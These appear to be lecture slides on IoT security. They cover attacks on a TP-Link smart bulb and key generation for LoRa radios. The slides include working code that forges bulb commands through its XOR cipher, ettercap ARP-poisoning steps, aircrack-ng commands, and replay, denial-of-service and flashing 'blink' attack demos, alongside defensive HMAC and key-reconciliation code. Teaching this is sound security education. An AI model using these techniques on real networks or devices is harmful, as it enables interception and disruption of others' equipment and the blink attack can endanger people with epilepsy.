Dr Weitao Associate
IoT Security Analysis: Experimental Study
• Analyse the security of IoT devices
➢ Case study: smart bulb
➢ Common tools
➢ Common attacks and countermeasures
• Key generation from wireless channels
➢ Principles
➢ Case study: LoRa (Long Range Communication)
TP-link smart bulb
• Change color
• Change brightness
• Works with any Wi-Fi router
• Energy Saving
• Works with Google assistant and Amazon Alexa
Experimental Set-up
• TCP/UDP protocols between router and bulb, router and App
• Control messages sent from the app to the light bulb via the AP
• Bulb acts as an access point (AP) that the app can connect to
https://www.youtube.com/watch?v=TexzX2AKU0Q
Wi-Fi router
Security requirements
• Confidentiality
• Integrity
• Availability
Confidentiality
Weak Encryption: XOR cipher
Decryption attack
XOR encryption is easy to attack!
import json
import socket
import struct

def encrypt(message):
    # "Autokey" XOR: each plaintext byte is XORed with the previous ciphertext byte,
    # starting from the fixed, publicly known initial key 0xAB
    key = 0xAB
    message = list(message)          # message must be bytes, not str
    for i, byte in enumerate(message):
        message[i] = byte ^ key
        key = message[i]             # next key = this ciphertext byte
    return bytes(message)

def decrypt(message):
    # Inverse of encrypt: XOR with the previous ciphertext byte, again starting at 0xAB
    key = 0xAB
    message = list(message)
    for i, byte in enumerate(message):
        message[i] = byte ^ key
        key = byte                   # next key = the ciphertext byte just consumed
    return bytes(message)

data = {"smartlife.iot.smartbulb.lightingservice": {
    "transition_light_state": {"on_off": 0, "transition_period": 0}}}
# Frame = 4-byte big-endian data length + encrypt(JSON payload), sent to bulb_ip_address:9999 over TCP
payload = encrypt(json.dumps(data).encode())
frame = struct.pack(">I", len(payload)) + payload
bulb_ip_address = "<bulb IP>"        # placeholder: the bulb's address found during the scan
with socket.create_connection((bulb_ip_address, 9999)) as s:
    s.sendall(frame)
https://www.openlearning.com/u/cooperchen/blog/HackingTplinkSmartBulb
• No authentication/integrity check
• Data may be modified in transit without the bulb noticing
• Susceptible to packet modification attacks etc.
Availability
• The measure of how easily an attacker can reach the device and deny access to the intended user
• Easy to attack the device by either replay or packet injection methods
• Sending multiple ‘off’ packets to deny service (DoS)
• Ettercap
• Aircrack-ng
• Wireshark
• Packet sender
• ALFA Wi-Fi router
Attacker: me!
Get started with hacking
Preparation
1. Use ettercap to obtain MAC and IP information of the bulb
   ettercap -G
   Sniffer -> wlan0
   Hosts -> Host list -> Scan for hosts
   Tips: must connect to the local Wi-Fi through the ALFA router
2. Start ARP poisoning attack: to capture the messages between phone and bulb
   1) 10.0.0.26 -> add to target 1
      10.0.0.137 -> add to target 2
   2) MITM -> ARP poisoning attack -> only poison one way
   3) View -> Connections -> click smartphone
   Colour control: UDP 9999
   Turn on/off: TCP 9999
3. Use nmap to obtain the port information of the bulb
4. Use Aircrack-ng to scan the local network
   airmon-ng
   airmon-ng start wlan0
   airmon-ng check kill
   airodump-ng wlan0mon
   airmon-ng stop wlan0mon
Common Attacks - replay attack
• Type of man-in-the-middle attack
• Genuine traffic is captured
• Then maliciously replayed
Replay attack-demo
1. Use Wireshark to capture packets
Tips: must perform the ARP poisoning attack first, otherwise you can’t capture messages.
Replay attack-demo
2. Use Filter to find useful packets
Replay attack-demo
3. Use Packet Sender to replay packets
Or write your own scripts to perform replay attack.
Common Attacks - denial-of-service (DoS) attack
• Replay attack and injection attack can both be used to deny service
DoS attack - demo
Write a script to keep sending the OFF command.
Blink attack - demo
Write a script to turn the bulb on/off continuously.
- Epilepsy!
Countermeasures
Decryption attack
- use more advanced encryption methods like AES.
Replay attack
- sequence number or timestamp
DoS attack
- hard to prevent because there are many ways to attack
- Strategies:
  channel hopping
  detect jamming area
  filters/detectors to block suspicious actions.
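The replay and integrity countermeasures above (a sequence number plus an authentication tag), as an added example written for this page and not TP-Link's firmware. It keeps the slide's 4-byte big-endian length framing but replaces the unauthenticated XOR payload with an HMAC-SHA256 tag over a sequence number and the JSON command; the shared key and the bulb's starting state are constructed. Confidentiality (the AES countermeasure) is left out because the standard library has no AES.

```python
import hmac, hashlib, json, struct

# Constructed example key: in a real design it is provisioned per bulb during pairing.
SHARED_KEY = b"example-shared-key-provisioned-at-pairing"
OFF_CMD = {"smartlife.iot.smartbulb.lightingservice":
           {"transition_light_state": {"on_off": 0, "transition_period": 0}}}
TAG_LEN = 32  # HMAC-SHA256 tag length

def build_frame(seq, command, key=SHARED_KEY):
    """Frame = 4-byte big-endian length | 8-byte sequence number | JSON payload | HMAC-SHA256 tag.
    The tag covers sequence number and payload, so neither can be altered without the key."""
    body = struct.pack(">Q", seq) + json.dumps(command, separators=(",", ":")).encode()
    tag = hmac.new(key, body, hashlib.sha256).digest()
    return struct.pack(">I", len(body) + TAG_LEN) + body + tag

class Bulb:
    """Receiver model: verifies the tag first, then requires a strictly increasing sequence number."""
    def __init__(self, key=SHARED_KEY):
        self.key, self.last_seq = key, -1
        self.state = {"on_off": 1}  # constructed starting state: bulb is on

    def receive(self, frame):
        if len(frame) < 4 + 8 + TAG_LEN:
            return "rejected: malformed"
        (length,) = struct.unpack(">I", frame[:4])
        if len(frame) != 4 + length:
            return "rejected: malformed"
        body, tag = frame[4:-TAG_LEN], frame[-TAG_LEN:]
        if not hmac.compare_digest(hmac.new(self.key, body, hashlib.sha256).digest(), tag):
            return "rejected: bad tag"   # modified command or altered sequence number
        (seq,) = struct.unpack(">Q", body[:8])
        if seq <= self.last_seq:
            return "rejected: replay"    # already-seen or stale frame, even though the tag is valid
        self.last_seq = seq
        cmd = json.loads(body[8:])
        self.state.update(cmd["smartlife.iot.smartbulb.lightingservice"]["transition_light_state"])
        return "accepted"

def demo():
    bulb = Bulb()
    frame1 = build_frame(1, OFF_CMD)
    results = [bulb.receive(frame1), bulb.receive(frame1)]  # genuine OFF, then a verbatim replay
    tampered = bytearray(frame1)
    tampered[-TAG_LEN - 8] ^= 1                             # flip one payload byte
    results.append(bulb.receive(bytes(tampered)))
    bumped = bytearray(frame1)
    bumped[11] ^= 1                                         # change the sequence number without the key
    results.append(bulb.receive(bytes(bumped)))
    results.append(bulb.receive(build_frame(2, OFF_CMD)))   # next genuine frame is accepted
    return results, bulb.state["on_off"]
```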
• Learned how to analyse the security of IoT devices
• Learned how to use security analysis tools, such as wireshark, packet sender
More references
• More hacking tools https://www.cse.wustl.edu/~jain/cse571-07/ftp/wireless_hacking/index.html#24
• Hack Tp-link smart bulb
https://www.openlearning.com/u/cooperchen/blog/HackingTplink
• Hack LIFX bulb https://sites.google.com/view/lifx-replay-attack/command-list?authuser=0
Appendix: hacking tools
• A Linux distribution designed for digital forensics and penetration testing.
• Supports a lot of tools:
  Aircrack-ng
  Reverse engineering tools ...
• Ettercap is a comprehensive suite for man-in-the-middle attacks.
• Protocol analysis
• Security auditing
Aircrack-ng
Aircrack-ng is a complete suite of tools to assess WiFi network security.
It focuses on different areas of WiFi security:
• Monitoring: Packet capture and export of data to text files for further processing by third party tools
• Attacking: Replay attacks, deauthentication, fake access points and others via packet injection
• Testing: Checking WiFi cards and driver capabilities (capture and injection)
• Cracking: WEP and WPA PSK (WPA 1 and 2)
• Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development
Packet sender
• Packet Sender is an open source utility to allow sending and receiving TCP and UDP packets.
ALFA Wi-Fi router
• Receive/send 802.11 packets
• Used for packet sniffing and packet injection
Key generation from wireless channels
• Principles
• Case study: LoRa (Long Range Communication)
Background - Wireless security
Wireless sensor network (WSN)
• Alice and Bob share the same key
• Eve can’t obtain or guess the key
Traditional key generation/negotiation methods
1. Pre-shared key.
Used forever; insecure
2. Public key infrastructure (PKI).
Unsuitable for mobile computing devices.
3. Diffie–Hellman (D-H) protocol.
Computational overhead is expensive for embedded sensors.
How to generate keys from wireless channel?
Use wireless channel characteristics to generate keys.
- Received signal strength indicator (RSSI)
- Channel state information (CSI)
Principles:
1. Reciprocity of radio wave propagation
2. Temporal variations in the radio channel
3. Spatial variations in the radio channel.
d > 16 cm for 915 MHz
Different LPWAN technologies
Case study: key generation system for LoRa
What is LoRa?
LoRa: Long Range Communication Technology
LoRa® is the physical layer or the wireless modulation utilized to create the long range communication link.
Key features
• Unlicensed spectrum: North America 915 MHz, Europe 868 MHz
• Low power consumption
• Low data rate (300 bps to 30 kbps)
• Long range: Urban 0-5 km, Rural 0-10 km
Key generation pipeline:
Channel measurement -> Quantization -> Reconciliation -> Privacy Amplification -> Secure communication
Quantization: convert RSSI into bits (0 or 1)
Segmentation
Calculate boundaries
Quantization
Reconciliation:
▪ Correct mismatches
K_Alice = 1101001
K_Bob   = 1001101
K_Alice ≈ K_Bob -> error-correction code
f(·): encode function, g(·): decode function
Alice: δ_Alice = K_Alice ⊕ f(g(K_Alice))
Bob:   K'_Alice = δ_Alice ⊕ f(g(K_Bob ⊕ δ_Alice))
Privacy amplification
▪ The reconciliation step reveals information to attackers
Alice and Bob exchange a number of packets for this step
▪ Universal hash function (e.g. SHA)
▪ After key generation, Alice and Bob can use a symmetric encryption method such as AES to secure their communication.
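The reconciliation and privacy amplification steps above, as an added example (not the lecture's or any LoRa module's code), with the slide's f(·)/g(·) instantiated by a systematic Hamming(7,4) code and SHA-256 as the hash. Run on the slide's own keys, where K_Alice and K_Bob differ in two positions, it shows the failure mode a practitioner must plan for: a code that corrects only one error leaves the keys mismatched, so the code must be chosen to match the expected mismatch rate. The 4-bit data layout and H_COLS are assumptions of this example.

```python
import hashlib

# Parity-check columns of a systematic Hamming(7,4) code; codeword layout is d1 d2 d3 d4 p1 p2 p3.
H_COLS = [(1, 1, 0), (1, 0, 1), (0, 1, 1), (1, 1, 1), (1, 0, 0), (0, 1, 0), (0, 0, 1)]

def bits(s):
    return [int(b) for b in s]

def xor(a, b):
    return [x ^ y for x, y in zip(a, b)]

def f(data):
    """Encode function f(.): 4 data bits -> 7-bit codeword."""
    d1, d2, d3, d4 = data
    return [d1, d2, d3, d4, d1 ^ d2 ^ d4, d1 ^ d3 ^ d4, d2 ^ d3 ^ d4]

def g(word):
    """Decode function g(.): 7 bits -> 4 data bits, correcting at most one flipped bit."""
    syndrome = tuple(sum(w * col[i] for w, col in zip(word, H_COLS)) % 2 for i in range(3))
    word = list(word)
    if syndrome != (0, 0, 0):
        word[H_COLS.index(syndrome)] ^= 1  # the syndrome names the single flipped position
    return word[:4]

def alice_helper(k_alice):
    """delta_Alice = K_Alice xor f(g(K_Alice)); sent over the public channel."""
    return xor(k_alice, f(g(k_alice)))

def bob_reconcile(k_bob, delta):
    """K'_Alice = delta xor f(g(K_Bob xor delta)); equals K_Alice only if the mismatches fit the code."""
    return xor(delta, f(g(xor(k_bob, delta))))

def privacy_amplify(key_bits):
    """Hash the reconciled bits so the n-k bits exposed by delta no longer help an eavesdropper."""
    return hashlib.sha256("".join(map(str, key_bits)).encode()).hexdigest()

def run(k_alice, k_bob):
    delta = alice_helper(k_alice)
    k_bob_corrected = bob_reconcile(k_bob, delta)
    return {"mismatches": sum(xor(k_alice, k_bob)),
            "leaked_bits": len(k_alice) - 4,  # n - k bits of delta are public
            "match": k_bob_corrected == k_alice,
            "key_alice": privacy_amplify(k_alice),
            "key_bob": privacy_amplify(k_bob_corrected)}
```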
Evaluation
Experimental device: mDot LoRa module
Scenarios:
• Indoor static
• Indoor mobile
• Outdoor static
• Outdoor mobile
• Key generation rate (bits/sec)
• Key match rate (%)
Evaluation
Experimental setup:
Correlation analysis
• Learned the basics of key generation from wireless channels
• Learned how to generate keys for LoRa